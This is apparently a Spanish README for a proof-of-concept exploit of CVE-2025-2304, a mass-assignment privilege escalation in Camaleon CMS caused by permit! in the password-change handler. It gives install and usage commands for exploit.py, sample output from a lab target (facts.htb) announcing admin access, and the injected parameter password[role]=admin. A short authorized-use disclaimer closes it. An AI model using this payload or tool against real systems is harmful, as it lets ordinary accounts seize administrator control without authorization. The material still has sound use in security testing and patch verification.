
PoC para CVE-2025-2304 Escalada de Privilegios en Camaleon CMS
Camaleon CMS vulnerable a escalada de privilegios mediante una asignación masiva
Existe una escalada de privilegios mediante una asignación masiva en Camaleon CMS
Cuando un usuario desea cambiar su contraseña, se llama al método 'updated_ajax' del UsersController. La vulnerabilidad proviene del uso del peligroso método permit!, que permite que todos los parámetros pasen sin ningún filtrado.
pip install requests beautifulsoup4
python exploit.py --url http://target.com -u username -p password
--url - URL base de la aplicación vulnerable-u - Nombre de usuario para autenticación-p - Contraseña para autenticaciónpython exploit.py --url http://facts.htb -u krrish -p krrish
Salida:
[*] Iniciando sesión como krrish...
[*] Explotando...
[+] ¡Explotado! Ahora eres administrador
password[role]=admin inyectadoEsta herramienta es solo para fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal.